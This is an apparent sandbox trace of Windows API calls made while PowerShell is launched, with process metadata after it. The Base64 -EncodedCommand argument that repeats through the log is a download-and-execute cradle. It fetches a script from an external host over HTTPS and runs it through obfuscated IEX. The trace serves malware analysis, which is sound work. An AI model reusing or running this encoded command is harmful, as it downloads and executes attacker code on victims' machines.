	[0428.618] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.618] SetErrorMode (uMode=0x1) returned 0x1
	[0428.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.619] SetErrorMode (uMode=0x1) returned 0x1
	[0428.619] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.619] SetErrorMode (uMode=0x1) returned 0x1
	[0428.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.619] SetErrorMode (uMode=0x1) returned 0x1
	[0428.619] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.619] SetErrorMode (uMode=0x1) returned 0x1
	[0428.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.620] SetErrorMode (uMode=0x1) returned 0x1
	[0428.620] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.620] SetErrorMode (uMode=0x1) returned 0x1
	[0428.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.620] SetErrorMode (uMode=0x1) returned 0x1
	[0428.620] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.621] SetErrorMode (uMode=0x1) returned 0x1
	[0428.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.621] SetErrorMode (uMode=0x1) returned 0x1
	[0428.621] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.621] SetErrorMode (uMode=0x1) returned 0x1
	[0428.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.622] SetErrorMode (uMode=0x1) returned 0x1
	[0428.622] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.622] SetErrorMode (uMode=0x1) returned 0x1
	[0428.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.622] SetErrorMode (uMode=0x1) returned 0x1
	[0428.622] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.622] SetErrorMode (uMode=0x1) returned 0x1
	[0428.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.623] SetErrorMode (uMode=0x1) returned 0x1
	[0428.623] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.623] SetErrorMode (uMode=0x1) returned 0x1
	[0428.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.623] SetErrorMode (uMode=0x1) returned 0x1
	[0428.623] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.624] SetErrorMode (uMode=0x1) returned 0x1
	[0428.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.624] SetErrorMode (uMode=0x1) returned 0x1
	[0428.624] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.624] SetErrorMode (uMode=0x1) returned 0x1
	[0428.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.624] SetErrorMode (uMode=0x1) returned 0x1
	[0428.625] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.625] SetErrorMode (uMode=0x1) returned 0x1
	[0428.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.625] SetErrorMode (uMode=0x1) returned 0x1
	[0428.625] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.625] SetErrorMode (uMode=0x1) returned 0x1
	[0428.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.626] SetErrorMode (uMode=0x1) returned 0x1
	[0428.626] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.626] SetErrorMode (uMode=0x1) returned 0x1
	[0428.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.626] SetErrorMode (uMode=0x1) returned 0x1
	[0428.626] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.627] SetErrorMode (uMode=0x1) returned 0x1
	[0428.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.627] SetErrorMode (uMode=0x1) returned 0x1
	[0428.627] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x205080
	[0428.628] FindNextFileW (in: hFindFile=0x205080, lpFindFileData=0x1c7ed970 | out: lpFindFileData=0x1c7ed970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0428.628] FindClose (in: hFindFile=0x205080 | out: hFindFile=0x205080) returned 1
	[0428.628] SetErrorMode (uMode=0x1) returned 0x1
	[0428.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7eda80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0428.629] SetErrorMode (uMode=0x1) returned 0x1
	[0428.629] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7edc90 | out: lpFileInformation=0x1c7edc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0428.630] SetErrorMode (uMode=0x1) returned 0x1
	[0428.631] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.631] CoTaskMemFree (pv=0x1ede80) 
	[0428.632] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.632] CoTaskMemFree (pv=0x1ede80) 
	[0428.635] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.635] CoTaskMemFree (pv=0x1ede80) 
	[0428.879] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.880] CoTaskMemFree (pv=0x1ede80) 
	[0428.892] CoTaskMemAlloc (cb=0x3b) returned 0x1addf0
	[0428.892] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ede78, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ede78) returned 0x4550
	[0428.931] CoTaskMemFree (pv=0x1addf0) 
	[0428.933] GetConsoleWindow () returned 0x102de
	[0428.942] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.942] CoTaskMemFree (pv=0x1ede80) 
	[0428.943] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.943] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0428.943] CoTaskMemFree (pv=0x1ede80) 
	[0428.948] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0428.948] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0428.949] CoTaskMemFree (pv=0x1ede80) 
	[0428.951] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7edec0 | out: pNumArgs=0x1c7edec0) returned 0x150000*=""
	[0428.952] lstrlenW (lpString="-EncodedCommand") returned 15
	[0428.953] CoTaskMemAlloc (cb=0x22) returned 0x1b7850a0
	[0428.953] RtlMoveMemory (in: Destination=0x1b7850a0, Source=0x150022, Length=0x20 | out: Destination=0x1b7850a0) 
	[0428.953] CoTaskMemFree (pv=0x1b7850a0) 
	[0428.953] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0428.953] CoTaskMemAlloc (cb=0x2f4) returned 0x180d90
	[0428.953] RtlMoveMemory (in: Destination=0x180d90, Source=0x150042, Length=0x2f2 | out: Destination=0x180d90) 
	[0428.953] CoTaskMemFree (pv=0x180d90) 
	[0428.954] LocalFree (hMem=0x150000) returned 0x0
	[0428.954] CoTaskMemAlloc (cb=0x804) returned 0x1b7a65e0
	[0428.955] GetConsoleTitleW (in: lpConsoleTitle=0x1b7a65e0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0429.145] CoTaskMemFree (pv=0x1b7a65e0) 
	[0429.155] CoTaskMemAlloc (cb=0x38e) returned 0x180d90
	[0429.155] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7ede20*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fdc380 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2fdc380*(hProcess=0x36c, hThread=0x368, dwProcessId=0x150c, dwThreadId=0x1510)) returned 1
	[0429.409] CoTaskMemFree (pv=0x180d90) 
	[0429.410] CloseHandle (hObject=0x368) returned 1
	[0429.410] CoTaskMemAlloc (cb=0x3b) returned 0x1addf0
	[0429.410] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7edec8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7edec8) returned 0x4550
	[0429.411] CoTaskMemFree (pv=0x1addf0) 
	[0429.414] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.414] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.415] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7edfa8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7edfa8*=0x368) returned 1

Process:
	id = "35"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x14703000"
	os_pid = "0x2b0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 186
	os_tid = 0x384

	[0402.505] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0404.351] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0404.351] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0404.351] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0404.351] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0408.157] GetVersionExW (in: lpVersionInformation=0x26db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
